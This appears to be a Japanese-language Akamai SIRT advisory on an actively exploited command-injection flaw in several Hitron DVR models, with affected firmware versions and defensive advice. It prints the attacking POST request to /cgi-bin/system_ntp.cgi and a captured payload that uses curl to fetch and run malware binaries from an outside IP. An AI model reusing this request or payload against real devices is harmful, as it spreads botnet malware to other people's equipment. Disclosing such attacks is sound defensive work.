クラウドコンピューティングが必要ですか? 今すぐ始める

Hitron DVR で活発に悪用される脆弱性:修正済み、パッチが利用可能

Akamai Wave Blue

執筆者

Aline Eliovich, Kyle Lefton, Chad Seaman, and Larry Cashdollar

January 30, 2024

Aline Eliovich

執筆者

Aline Eliovich

Aline Eliovich は、セキュリティ分野で 6 年間の経験を有しています。現在 Akamai の Security Intelligence Response Team のリサーチャーとして勤務しています。Holon Technology Institute でコンピューターサイエンスを学び、業務では様々なオープン・ソース・インテリジェンス(OSINT)手法を研究に活用しています。

Akamai blue wave

執筆者

Kyle Lefton

Kyle Lefton は、Akamai の Security Intelligence Response Team のセキュリティ・リサーチ・インターンです。以前は国防総省の情報アナリストとして、サイバー防衛、脅威リサーチ、防諜の分野で数年にわたって体験を積んできました。新たな脅威のリサーチ、脆弱性の研究、脅威グループのマッピングに誇りをもって取り組んでいます。友人や家族と過ごす時間、戦略ゲーム、アウトドアでのハイキングが、オフの時間の楽しみです。

Chad Seaman headshot

執筆者

Chad Seaman

Chad Seaman は、Principal Security Researcher 兼 Security Intelligence Response Team の Team Lead です。彼は自称「インターネットのゴミあさり人」です。自分がインターネットで見つけた「ゴミ」を調査することを楽しみとしています。プログラマーとしてキャリアを始め、その後侵害に関する調査の際にセキュリティ、悪用、フォレンジックなどに触れたことで、すぐにセキュリティが彼の天職になりました。現在は、マルウェア調査、リバースエンジニアリング、脆弱性調査、DDoS、サイバー犯罪調査を中心に行っています。彼の趣味は、飛行機の操縦、紙に一定間隔で穴を開けて絵を描くこと、そして森の小道をダートバイクで走り、自然の中で時間を過ごすことです。

Larry Cashdollar

執筆者

Larry Cashdollar

Larry W. Cashdollar は、20 年以上にわたり脆弱性リサーチャーとしてセキュリティ分野に携わり、現在は Akamai の Security Intelligence Response Team の Principal Security Researcher を務めています。University of Southern Maine でコンピューターサイエンスを学びました。これまでに 300 件以上の CVE を文書化し、BotConf、BSidesBoston、OWASP Rhode Island、DEF CON で調査発表を行っています。余暇にはアウトドア活動や小型エンジンの修理を楽しんでいます。

Akamai SIRT は、InfectedSlurs 調査の中で、野放しになって活発に悪用されている複数の Hitron DVR デバイスモデルの脆弱性を発見しました。

エグゼクティブサマリー

知っておくべきこと

Akamai SIRT は、InfectedSlurs 調査の中で、野放しになって活発に悪用されている複数の Hitron DVR デバイスモデルの脆弱性を発見しました。Hitron のデバイスは、Hitron Systems によって韓国で製造されています。

この脆弱性により、認証を受けた攻撃者は、管理インターフェースへの POST リクエストを介して配信されるペイロードを使用して、OS コマンドインジェクションを実行することができます。現在の設定では、キャプチャされたペイロードでデバイスのデフォルトの認証情報が使用されています。

影響を受けるデバイスとファームウェアのバージョンは次のとおりです。

  • DVR HVR-4781:バージョン 1.03~4.02

  • DVR HVR-8781:バージョン 1.03~4.02

  • DVR HVR-16781:バージョン 1.03~4.02

  • DVR LGUVR-4H:バージョン 1.02~4.02

  • DVR LGUVR-8H:バージョン 1.02~4.02

  • DVR LGUVR-16H:バージョン 1.02~4.02

ベンダー(Hitron Systems)は、この脆弱性に対処するための新しいファームウェアバージョンをリリースしました。影響を受けるすべてのモデルについて、できるだけ早くファームウェアバージョン 4.03 以降にアップグレードすることを推奨しています。また、勧告も CISAKISAから発せられています。KISA も個別の CVE に関する勧告を行っており、以下のリンクで参照することができます。

観測された攻撃

2023 年 10 月下旬、Akamai SIRT のアナリストは、めったに悪用されない TCP ポートを標的としたハニーポットに対する活動が急増していることに気づきました。プローブは頻度が少なく、最初に /cgi-bin/system_ntp.cgi に対する POST リクエストを通じて認証を試み(図 1)、続けてコマンドインジェクション攻撃を試みているようでした(図 2)。 標的にされたデバイスは、コマンドインジェクションによる RCE に対して脆弱な Hitron Systems DVR のデバイスです(図 3)。認証に成功すると、攻撃者はコマンドインジェクション攻撃を仕掛けます。その標的は、 timeserver というパラメーターの脆弱性で、これは /cgi-bin/system_ntp.cgiに POST リクエストを送信する際に使用するパラメーターです。

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

図 1:認証の試み

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

図 2:攻撃の試み

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

図 3:キャプチャされた RCE ペイロード

防御

この脆弱性の影響を受けるデバイスを使用している Hitron DVR ユーザーは、RCE の脆弱性を修正した最新のファームウェアバージョン(4.03 以降)に直ちにアップグレードする必要があります。  

また、このような脅威や将来の脅威から防御するために、いくつかのセキュリティ対策を講じる必要があります。 まず、影響を受けるデバイスを使用している組織や個人は、セキュリティを強化するために、デフォルトのログイン資格情報を直ちに変更する必要があります。ネットワークトラフィックとログを定期的に監視することで、疑わしいアクティビティを早期に検知することができます。特定された脆弱性に対処するためには、デバイス製造元からのセキュリティパッチおよびアップデートをタイムリーにインストールすることが重要です。

セキュリティ調査担当、脅威インテリジェンスプロバイダー、業界の同業者との間で連携を取ることにより、新たな脅威や脆弱性に関する情報を常に入手できます。最後に、接続されたデバイスの最新インベントリを維持し、 ネットワークセグメンテーション を実装すれば、このような攻撃の潜在的な影響を制限できます。

結論

Hitron Systems と関連デバイスで特定されたセキュリティ上の問題に対処するためには、ユーザーの意識向上、迅速なパッチ適用、予防的監視、サイバーセキュリティコミュニティ内での連携を組み合わせた多面的なアプローチが必要です。これらの対策を講じることで、組織や個人は、観察された悪性のアクティビティによるリスクを大幅に軽減することができます。

今後の情報提供

SIRT やその他の Akamai セキュリティ・リサーチ・グループによる最新の脅威やその他の知見を確認するためには、 X(旧 Twitter)で Akamai をフォロー するか、または SIG ハブをチェックしてください。

この脆弱性をベンダーに報告するためにご協力いただいた CISA、US-CERT、KISA のスタッフの皆様に、Akamai SIRT 一同、感謝申し上げます。



Akamai Wave Blue

執筆者

Aline Eliovich, Kyle Lefton, Chad Seaman, and Larry Cashdollar

January 30, 2024

Aline Eliovich

執筆者

Aline Eliovich

Aline Eliovich は、セキュリティ分野で 6 年間の経験を有しています。現在 Akamai の Security Intelligence Response Team のリサーチャーとして勤務しています。Holon Technology Institute でコンピューターサイエンスを学び、業務では様々なオープン・ソース・インテリジェンス(OSINT)手法を研究に活用しています。

Akamai blue wave

執筆者

Kyle Lefton

Kyle Lefton は、Akamai の Security Intelligence Response Team のセキュリティ・リサーチ・インターンです。以前は国防総省の情報アナリストとして、サイバー防衛、脅威リサーチ、防諜の分野で数年にわたって体験を積んできました。新たな脅威のリサーチ、脆弱性の研究、脅威グループのマッピングに誇りをもって取り組んでいます。友人や家族と過ごす時間、戦略ゲーム、アウトドアでのハイキングが、オフの時間の楽しみです。

Chad Seaman headshot

執筆者

Chad Seaman

Chad Seaman は、Principal Security Researcher 兼 Security Intelligence Response Team の Team Lead です。彼は自称「インターネットのゴミあさり人」です。自分がインターネットで見つけた「ゴミ」を調査することを楽しみとしています。プログラマーとしてキャリアを始め、その後侵害に関する調査の際にセキュリティ、悪用、フォレンジックなどに触れたことで、すぐにセキュリティが彼の天職になりました。現在は、マルウェア調査、リバースエンジニアリング、脆弱性調査、DDoS、サイバー犯罪調査を中心に行っています。彼の趣味は、飛行機の操縦、紙に一定間隔で穴を開けて絵を描くこと、そして森の小道をダートバイクで走り、自然の中で時間を過ごすことです。

Larry Cashdollar

執筆者

Larry Cashdollar

Larry W. Cashdollar は、20 年以上にわたり脆弱性リサーチャーとしてセキュリティ分野に携わり、現在は Akamai の Security Intelligence Response Team の Principal Security Researcher を務めています。University of Southern Maine でコンピューターサイエンスを学びました。これまでに 300 件以上の CVE を文書化し、BotConf、BSidesBoston、OWASP Rhode Island、DEF CON で調査発表を行っています。余暇にはアウトドア活動や小型エンジンの修理を楽しんでいます。